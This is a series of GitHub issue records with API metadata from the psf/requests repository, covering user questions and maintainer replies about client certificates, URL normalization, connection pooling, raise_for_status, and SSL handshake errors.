https://api.github.com/repos/psf/requests/issues/2405/timeline
null
completed
null
null
false
[ "By which you mean TLS authentication? Yes, it's enabled by default.\n", "I apologise, I may have misread. Do you mean TLS _client_ certificates?\n", "Yeah, sorry. I'm piecing together some horrible documentation from our vendor. The example app they gave is corrupted so awaiting that back. The language from documentation that I do have is\n\n> In addition to using the certificate to establish the SSL connection, your system will need to use a client key and secret to authenticate to the APIs.\n", "Ok, so we can use client certificates. You use the `cert` keyword as documented [here](http://docs.python-requests.org/en/latest/api/#requests.request).\n", "Awesome. Thanks!\n" ]
https://api.github.com/repos/psf/requests/issues/2404
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2404/labels{/name}
https://api.github.com/repos/psf/requests/issues/2404/comments
https://api.github.com/repos/psf/requests/issues/2404/events
https://github.com/psf/requests/issues/2404
53,957,330
MDU6SXNzdWU1Mzk1NzMzMA==
2,404
requests removes characters from valid url
{ "avatar_url": "https://avatars.githubusercontent.com/u/4533323?v=4", "events_url": "https://api.github.com/users/NikolaiT/events{/privacy}", "followers_url": "https://api.github.com/users/NikolaiT/followers", "following_url": "https://api.github.com/users/NikolaiT/following{/other_user}", "gists_url": "https://api.github.com/users/NikolaiT/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/NikolaiT", "id": 4533323, "login": "NikolaiT", "node_id": "MDQ6VXNlcjQ1MzMzMjM=", "organizations_url": "https://api.github.com/users/NikolaiT/orgs", "received_events_url": "https://api.github.com/users/NikolaiT/received_events", "repos_url": "https://api.github.com/users/NikolaiT/repos", "site_admin": false, "starred_url": "https://api.github.com/users/NikolaiT/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/NikolaiT/subscriptions", "type": "User", "url": "https://api.github.com/users/NikolaiT", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-10T12:52:12Z
2021-09-08T23:06:13Z
2015-01-10T13:10:21Z
NONE
resolved
Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why? Recreate bug with: ``` python #!/usr/bin/python3 from urllib.request import urlopen from requests import get url = 'http://incolumitas.com?#param=value' native = urlopen(url) req = get(url) assert native.url == req.url, '{} vs {}'.format(native.url, req.url) """ AssertionError: http://incolumitas.com?#param=value vs http://incolumitas.com/#param=value Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why? """ ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/4533323?v=4", "events_url": "https://api.github.com/users/NikolaiT/events{/privacy}", "followers_url": "https://api.github.com/users/NikolaiT/followers", "following_url": "https://api.github.com/users/NikolaiT/following{/other_user}", "gists_url": "https://api.github.com/users/NikolaiT/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/NikolaiT", "id": 4533323, "login": "NikolaiT", "node_id": "MDQ6VXNlcjQ1MzMzMjM=", "organizations_url": "https://api.github.com/users/NikolaiT/orgs", "received_events_url": "https://api.github.com/users/NikolaiT/received_events", "repos_url": "https://api.github.com/users/NikolaiT/repos", "site_admin": false, "starred_url": "https://api.github.com/users/NikolaiT/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/NikolaiT/subscriptions", "type": "User", "url": "https://api.github.com/users/NikolaiT", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2404/reactions" }
https://api.github.com/repos/psf/requests/issues/2404/timeline
null
completed
null
null
false
[ "The question mark indicates the beginning of the query portion of the URL. The octothorpe indicates the beginning of the fragment portion of the URL. We conclude that you have an empty query string and normalise it by removing the section entirely.\n\nIf the octothorpe is intended to be part of the query string you need to percent-encode it to avoid ambiguity. \n\n> On 10 Jan 2015, at 12:52, NikolaiT [email protected] wrote:\n> \n> Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why?\n> \n> Recreate bug with:\n> \n> #!/usr/bin/python3\n> \n> from urllib.request import urlopen\n> from requests import get\n> \n> url = 'http://incolumitas.com?#param=value'\n> \n> native = urlopen(url)\n> req = get(url)\n> \n> assert native.url == req.url, '{} vs {}'.format(native.url, req.url)\n> \n> \"\"\"\n> AssertionError: http://incolumitas.com?#param=value vs http://incolumitas.com/#param=value\n> \n> Requests strips the question mark when a hash tag follows. urlopen doesn't do it. Why?\n> \"\"\"\n> —\n> Reply to this email directly or view it on GitHub.\n", "I understand. Many thanks for the quick response. Will close.\n", "@NikolaiT just to give you some more detail about this:\n\nThe URI structure (that URLs follow) is of the form `{scheme}://{authority}{/path}{?query}{#fragment}`. (On Python 3) The `urllib.parse` module gives us the `urlparse` function to look at these components of a URL.\n\n``` py\n>>> import urllib.parse\n>>> uri = urllib.parse.urlparse('http://incolumitas.com?#param=value')\n>>> uri\nParseResult(scheme='http', netloc='incolumitas.com', path='', params='', query='', fragment='param=value')\n>>> uri.geturl()\n'http://incolumitas.com#param=value'\n```\n\nAccording to this module (and the RFC that defines handling of URIs) these two URLs are equivalent. This can be seen by visiting both in your browser. In essence, if we didn't modify the URL it would be as valid as our current approach is. We do normalize URLs though because servers (and sometimes users) give us some rather bizarre URLs that will only \"just work\" when normalized. As core developers of a library whose core design goal is to make users' lives better, we need to take this approach to satisfy that goal.\n\nI hope that helps give you a deeper understanding of what's happening, why it is okay, and why it _should_ happen.\n" ]
https://api.github.com/repos/psf/requests/issues/2403
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2403/labels{/name}
https://api.github.com/repos/psf/requests/issues/2403/comments
https://api.github.com/repos/psf/requests/issues/2403/events
https://github.com/psf/requests/issues/2403
53,785,849
MDU6SXNzdWU1Mzc4NTg0OQ==
2,403
Provide a way for all existing connections to be discarded
{ "avatar_url": "https://avatars.githubusercontent.com/u/116235?v=4", "events_url": "https://api.github.com/users/cameron314/events{/privacy}", "followers_url": "https://api.github.com/users/cameron314/followers", "following_url": "https://api.github.com/users/cameron314/following{/other_user}", "gists_url": "https://api.github.com/users/cameron314/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/cameron314", "id": 116235, "login": "cameron314", "node_id": "MDQ6VXNlcjExNjIzNQ==", "organizations_url": "https://api.github.com/users/cameron314/orgs", "received_events_url": "https://api.github.com/users/cameron314/received_events", "repos_url": "https://api.github.com/users/cameron314/repos", "site_admin": false, "starred_url": "https://api.github.com/users/cameron314/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/cameron314/subscriptions", "type": "User", "url": "https://api.github.com/users/cameron314", "user_view_type": "public" }
[]
closed
true
null
[]
null
6
2015-01-08T18:49:58Z
2021-09-08T23:06:14Z
2015-01-08T21:21:44Z
NONE
resolved
As I gather from various web searches, there's currently no way to manage the underlying TCP connections directly, since they're supposed to "just work" and be auto-recycled, etc. However, I have found one use case where this is not enough, and the sanest way to make it work would be to instruct `requests` to discard all open connections. Here's the use case: I have a web API I've written that I'd like to test using `requests`. Each test case starts a new instance of the API server, runs the test code, then stops the server. Because the tests run in quick succession, there's a race condition between the time the server exits (and Linux cleans up the socket) and the time that `requests` sees that the connection was closed. So, when the second test runs and starts a new instance of the server, `requests` thinks it can reuse the previous connection, which then fails (throws an exception) because the remote socket no longer exists. This is not really the fault of `requests` (technically the behaviour is correct -- the connection _was_ closed, after all), but this lack of control on the client side of the connection in face of asynchronous cleanup makes it difficult to to these types of connection tests. There's many workarounds I could use (currently I've inserted a sleep of 75ms between test runs, which works, as does using a different port for each test, or reusing the same instance of the server for all tests). But none of them are very elegant. Note that this doesn't happen on Windows, for some reason, only Linux (Fedora 21). Sample exception from the second test case (if I don't sleep): ``` Traceback (most recent call last): File "tests.py", line 52, in setUp requests.get(api, cookies=cookies) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/api.py", line 65, in get return request('get', url, **kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/api.py", line 49, in request response = session.request(method=method, url=url, **kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/sessions.py", line 461, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/sessions.py", line 573, in send r = adapter.send(request, **kwargs) File "/usr/lib/python2.7/site-packages/requests-2.5.0-py2.7.egg/requests/adapters.py", line 415, in send raise ConnectionError(err, request=request) ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/116235?v=4", "events_url": "https://api.github.com/users/cameron314/events{/privacy}", "followers_url": "https://api.github.com/users/cameron314/followers", "following_url": "https://api.github.com/users/cameron314/following{/other_user}", "gists_url": "https://api.github.com/users/cameron314/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/cameron314", "id": 116235, "login": "cameron314", "node_id": "MDQ6VXNlcjExNjIzNQ==", "organizations_url": "https://api.github.com/users/cameron314/orgs", "received_events_url": "https://api.github.com/users/cameron314/received_events", "repos_url": "https://api.github.com/users/cameron314/repos", "site_admin": false, "starred_url": "https://api.github.com/users/cameron314/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/cameron314/subscriptions", "type": "User", "url": "https://api.github.com/users/cameron314", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2403/reactions" }
https://api.github.com/repos/psf/requests/issues/2403/timeline
null
completed
null
null
false
[ "Hi there! Thanks for this detailed feature request.\n\nBefore we go too far I want to nail down exactly what's going on. Requests only re-uses connections at the scope of a single `Session` object. Given that you're calling `requests.get`, you should _not_ be seeing any connection re-use of any kind. We don't keep a single implicit session floating around. For that reason, I'm inclined to believe your problem is not actually caused by our connection re-use.\n\nIs that analysis correct?\n", "Oho! I thought it automatically reused connections even without a session object.\n\nSo yes, then, your analysis must be correct. I'm at a loss to explain what's happening, then.\n\nI should note that when I run the tests on Windows with Fiddler capturing the traffic, it shows the first request of each test case taking an extra 500ms in the \"TCP/IP Connect\" stage, with subsequent ones (in that test case) taking 0ms. This to me suggests either a caching issue (e.g. DNS -- I had trouble at one point with localhost resolving to IPv6 first and causing a 1s delay on every new request in the same phase, but I \"fixed\" this by forcing localhost to resolve to 127.0.0.1) or connection reuse issue. Perhaps this is being done at a lower level than `requests` itself?\n", "I suspect so.\n\nYour DNS suggestion is a good explanation for the first request being delayed. Assuming you're running the test locally (that is, you're running both the server and test on localhost) that's a compelling explanation: TCP handshake should be <1ms on the loopback interface.\n\nConnection Refused is the error code when the TCP SYN packet is rejected, meaning that no-one is listening on the socket. Is it possible your initial request occurs before the web server has actually started listening on the socket?\n", "Oh -- I just realized where I put the sleep -- in between the process starting and the test starting. Obviously the race condition must be between the time the process starts and when the socket is actually bound, as you suggested. Thank you! I feel really stupid now :D\n\nI still don't understand why it works without the delay for the first test, though (which is why I thought it was a lingering old connection ('Connection aborted' pointed in that direction), not a problem with the new one ('Connection refused' points in this one)), or why it always works on Windows. Alas, I guess that's just the nature of race conditions.\n\nSorry for wasting your time! My use case for this feature is completely invalid, it seems, so I'll withdraw the feature request.\n", "It's not a waste of my time, I'm glad you asked. I hope you have success using requests!\n", "Definitely! I remember the \"good\" old days of using urllib2... _shudder_ :-)\n" ]
https://api.github.com/repos/psf/requests/issues/2402
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2402/labels{/name}
https://api.github.com/repos/psf/requests/issues/2402/comments
https://api.github.com/repos/psf/requests/issues/2402/events
https://github.com/psf/requests/issues/2402
53,700,951
MDU6SXNzdWU1MzcwMDk1MQ==
2,402
Allow a 'verbose' flag for raise_for_status()
{ "avatar_url": "https://avatars.githubusercontent.com/u/1808790?v=4", "events_url": "https://api.github.com/users/mrname/events{/privacy}", "followers_url": "https://api.github.com/users/mrname/followers", "following_url": "https://api.github.com/users/mrname/following{/other_user}", "gists_url": "https://api.github.com/users/mrname/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mrname", "id": 1808790, "login": "mrname", "node_id": "MDQ6VXNlcjE4MDg3OTA=", "organizations_url": "https://api.github.com/users/mrname/orgs", "received_events_url": "https://api.github.com/users/mrname/received_events", "repos_url": "https://api.github.com/users/mrname/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mrname/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mrname/subscriptions", "type": "User", "url": "https://api.github.com/users/mrname", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-08T00:33:59Z
2018-09-06T12:19:50Z
2015-01-09T21:13:47Z
NONE
resolved
raise_for_status() is super awesome, but a lot of the time, the error code and message is not informative enough to assist with debgugging when an exception is raised. It would be nice to have a verbose flag for raise_for_status that would also print the response body, where more details are often included. I would be happy to work on this, but wanted to make sure it is not already in the works.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 5, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 5, "url": "https://api.github.com/repos/psf/requests/issues/2402/reactions" }
https://api.github.com/repos/psf/requests/issues/2402/timeline
null
completed
null
null
false
[ "If you do:\n\n``` py\nimport requests\n\nr = requests.get(url)\n\ntry:\n r.raise_for_status()\nexcept requests.exceptions.HTTPError as error:\n print(error)\n print(error.response.text)\n```\n\nWe don't print the body (and likely won't add it, even as a flag) for several reasons:\n- It may not exist (and therefore wouldn't be helpful)\n- It could be plain binary data which will certainly not help anyone\n- It could have characters that cannot be printed (and will cause even more problems)\n\nYou can certainly do this yourself and based on some searches on StackOverflow and our issues, it doesn't seem like anyone has had the need for this before.\n\nI'm -0.5 if only because `verbose` would obviously default to `False`.\n", "Thanks for the quick response @sigmavirus24. That makes a lot of sense. I was thinking that a verbose flag would avoid the need for the try/except structure, but it is simple enough to a make a little helper function that processes the request and does that. Thanks again! Please go ahead and close this out.\n", "Verbose flag would be very nice" ]
https://api.github.com/repos/psf/requests/issues/2401
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2401/labels{/name}
https://api.github.com/repos/psf/requests/issues/2401/comments
https://api.github.com/repos/psf/requests/issues/2401/events
https://github.com/psf/requests/issues/2401
53,515,560
MDU6SXNzdWU1MzUxNTU2MA==
2,401
Problems in SSL communication
{ "avatar_url": "https://avatars.githubusercontent.com/u/10159045?v=4", "events_url": "https://api.github.com/users/tesande/events{/privacy}", "followers_url": "https://api.github.com/users/tesande/followers", "following_url": "https://api.github.com/users/tesande/following{/other_user}", "gists_url": "https://api.github.com/users/tesande/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tesande", "id": 10159045, "login": "tesande", "node_id": "MDQ6VXNlcjEwMTU5MDQ1", "organizations_url": "https://api.github.com/users/tesande/orgs", "received_events_url": "https://api.github.com/users/tesande/received_events", "repos_url": "https://api.github.com/users/tesande/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tesande/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tesande/subscriptions", "type": "User", "url": "https://api.github.com/users/tesande", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-06T13:41:58Z
2021-09-08T23:00:46Z
2015-01-06T14:09:04Z
NONE
resolved
Hi again! This issue is related to the closed issue #2383 I have now investigated further. I have tried a different client agains the server, and this communication works fine. I have used wireshark to see how the handshake goes. With the java client things works out fine, but when using requests, the connection terminates with an Encrypted alert after the change Cipher spec. When I look at protocol in Wireshark, I see TLSv1 even if I change protocol using the SSLAdapter in the requests_toolbelt. Is this correct? I use OpenSSL 1.0.1h 5 Jun 2014. Could it be wise to try a different OpenSSL version? Which version is compatible with requests version 2.5.1? Regards Tor Erik
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2401/reactions" }
https://api.github.com/repos/psf/requests/issues/2401/timeline
null
completed
null
null
false
[ "requests can and does use whatever version of OpenSSL Python is compiled against. There is no bug in requests from what I can tell and the SSLAdapter in `requests_toolbelt` just works for me on both OpenSSL 1.0.1 and 0.9.8. If you need help with your code, please post your question on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests) with the code you're using and having problems with. The issue tracker is not a support forum.\n", "Hi @tesande , were you able to resolve the issue. I have a similar case where I have a server accepting tlsv1 and client using a request adapter with tlsv1. \nMy gunicorn server config \nkeyfile = '/path/to/keyfile'\ncertfile = '/path/to/certfile'\nca_certs = '/path/to/ca/cert'\ncert_reqs = ssl.CERT_OPTIONAL\nssl_version = ssl.PROTOCOL_TLSv1\ndo_handshake_on_connect = True\n\nMy client code looks like this:\nrequests_session = requests.Session()\nrequests_session.mount('https://', TLSAdapter)\nresp = requests.request(request.http_method, request.full_uri, data=request.data, headers=request_headers, verify=verify, cert=(cert, key))\n\n// tlsv1 adapter\nclass TLSAdapter(HTTPAdapter):\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLSv1)\n\nI get this\nTransportException: TransportException : <urlopen error [Errno 1] _ssl.c:493: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol>\n\nGoing into server logs, I also find these:\n _ssl.c:493: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number\n", "Hi!\n\nMy web server version was from 2003. After updating, things worked fine.\n\nHowever, if you don't need certification validation, you can turn that off. That might solve your problem\n\nDate: Fri, 17 Jul 2015 14:01:21 -0700\nFrom: [email protected]\nTo: [email protected]\nCC: [email protected]\nSubject: Re: [requests] Problems in SSL communication (#2401)\n\nHi @tesande , were you able to resolve the issue. I have a similar case where I have a server accepting tlsv1 and client using a request adapter with tlsv1. \n\nMy gunicorn server config \n\nkeyfile = '/path/to/keyfile'\n\ncertfile = '/path/to/certfile'\n\nca_certs = '/path/to/ca/cert'\n\ncert_reqs = ssl.CERT_OPTIONAL\n\nssl_version = ssl.PROTOCOL_TLSv1\n\ndo_handshake_on_connect = True\n\nMy client code looks like this:\n\nrequests_session = requests.Session()\n\nrequests_session.mount('https://', TLSAdapter)\n\nresp = requests.request(request.http_method, request.full_uri, data=request.data, headers=request_headers, verify=verify, cert=(cert, key))\n\n// tlsv1 adapter\n\nclass TLSAdapter(HTTPAdapter):\n\n def init_poolmanager(self, connections, maxsize, block=False):\n\n```\nself.poolmanager = PoolManager(num_pools=connections,\n\n maxsize=maxsize,\n\n block=block,\n\n ssl_version=ssl.PROTOCOL_TLSv1)\n```\n\nI get this\n\nTransportException: TransportException : \n\nGoing into server logs, I also find these:\n\n _ssl.c:493: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number\n\n—\nReply to this email directly or view it on GitHub.\n" ]
https://api.github.com/repos/psf/requests/issues/2400
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2400/labels{/name}
https://api.github.com/repos/psf/requests/issues/2400/comments
https://api.github.com/repos/psf/requests/issues/2400/events
https://github.com/psf/requests/issues/2400
53,473,702
MDU6SXNzdWU1MzQ3MzcwMg==
2,400
Using requests session with pool_block=True blocks indefinitely for name resolution errors
{ "avatar_url": "https://avatars.githubusercontent.com/u/1521409?v=4", "events_url": "https://api.github.com/users/sinank/events{/privacy}", "followers_url": "https://api.github.com/users/sinank/followers", "following_url": "https://api.github.com/users/sinank/following{/other_user}", "gists_url": "https://api.github.com/users/sinank/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sinank", "id": 1521409, "login": "sinank", "node_id": "MDQ6VXNlcjE1MjE0MDk=", "organizations_url": "https://api.github.com/users/sinank/orgs", "received_events_url": "https://api.github.com/users/sinank/received_events", "repos_url": "https://api.github.com/users/sinank/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sinank/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sinank/subscriptions", "type": "User", "url": "https://api.github.com/users/sinank", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2015-01-06T02:26:42Z
2021-09-08T23:05:46Z
2015-04-07T13:42:49Z
NONE
resolved
I am using a requests session pool in my code since we make a large number of HTTP requests. We recently ran into an issue where temporary name resolution errors blocked the process from making any more HTTP requests since the pool was full. I have pasted a quick script to reproduce the issue below. ``` from requests import Request, Session import requests import gevent from gevent import monkey monkey.patch_all() urltotest = 'http://thisisanunresolvablesite.com/foo' MAX_CONC_REQUESTS_PER_CONNECTION = 21 MAX_POOLS = 1 MAX_CONC_REQUESTS = 5 # Requests session pool http_pool = None def get_requests_session(): global http_pool if not http_pool: http_pool = Session() adapter = requests.adapters.HTTPAdapter( pool_connections=MAX_POOLS, pool_maxsize=MAX_CONC_REQUESTS, pool_block=True) http_pool.mount('http://', adapter) http_pool.mount('https://', adapter) return http_pool def send_request_in_greenlet(i): try: prepped = Request('GET', urltotest).prepare() session = get_requests_session() print 'Sending request #', i resp = session.send(prepped) body = str(resp.content) status = str(resp.status_code) print 'Reponse for request # %d - Status: %s' % (i, status) except Exception as ex: print ex i = 0 while i < 20: i += 1 gevent.spawn(send_request_in_greenlet, i) try: gevent.sleep(100) except KeyboardInterrupt: pass ``` The error seems to stem from the urlopen method in packages/urllib3/connectionpool.py: ``` ... except (TimeoutError, HTTPException, SocketError) as e: if conn: # Discard the connection for these exceptions. It will be # be replaced during the next _get_conn() call. conn.close() conn = None ... finally: if release_conn: # Put the connection back to be reused. If the connection is # expired then it will be None, which will get replaced with a # fresh connection during _get_conn. self._put_conn(conn) ``` I am not sure that this issue should be filed under urllib3 or requests. Apologizing in advance if I posted this at the wrong place.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2400/reactions" }
https://api.github.com/repos/psf/requests/issues/2400/timeline
null
completed
null
null
false
[ "Why aren't you using grequests for this?\n", "@sigmavirus24 Thanks for the suggestion. Will look it up.\nDoes using grequests allow connection pooling? I briefly looked at it right now and it does not look to be as feature rich as the requests library.\nWe make a ton of HTTP requests and connection pooling is important for us.\n", "At this point in time Session's aren't reliably threadsafe enough for you to use them like this. You're better off creating sessions in each worker and using a Queue to send work to the worker. (So you'll have connection pooling local to the thread but not between threads.)\n", "Closing due to inactivity \n" ]
https://api.github.com/repos/psf/requests/issues/2399
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2399/labels{/name}
https://api.github.com/repos/psf/requests/issues/2399/comments
https://api.github.com/repos/psf/requests/issues/2399/events
https://github.com/psf/requests/issues/2399
53,460,187
MDU6SXNzdWU1MzQ2MDE4Nw==
2,399
[Proposed Enhancement] Consume remainder of socket in Response.close
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
null
20
2015-01-05T23:11:00Z
2021-09-08T23:06:13Z
2015-01-13T02:44:59Z
CONTRIBUTOR
resolved
Earlier today I was speaking with @ducu on [IRC](https://botbot.me/freenode/python-requests/2015-01-05/?msg=28835010&page=1) about a problem they're having using `rq` and `requests`. My intuition (which is really all I have to work with about this problem) is that all of the content on the response is not being consumed and people assume that doing something like: ``` py with contextlib.closing(requests.get(url, stream=True)) as response: # do some stuff with response ``` The socket will close properly. If I remember correctly though, we've seen that if the socket isn't completely consumed, this won't allow the socket to be released (at least not immediately). I'm further suspicious this is the cause because killing one of the workers for `rq` lets the job resume. I wonder what people think about changing [`Response.close`](https://github.com/kennethreitz/requests/blob/7612015424c88cfd98f6be692ff994898aee1502/requests/models.py#L833) to be something like: ``` py def close(self): self.content self.raw.release_conn() ``` The call to self.content will consume the rest of the socket (if there's anything to consume) and then we'll release the connection (which should release the socket in this case). Thoughts? Also I'm pretty tired so I could be wrong about some of this stuff.
